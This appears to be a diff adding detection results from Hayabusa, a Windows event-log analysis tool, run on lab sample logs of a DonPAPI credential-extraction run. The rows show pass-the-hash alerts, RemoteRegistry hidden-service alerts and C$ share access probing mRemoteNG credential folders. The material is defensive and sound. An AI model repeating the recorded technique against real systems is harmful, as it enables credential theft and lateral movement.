+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
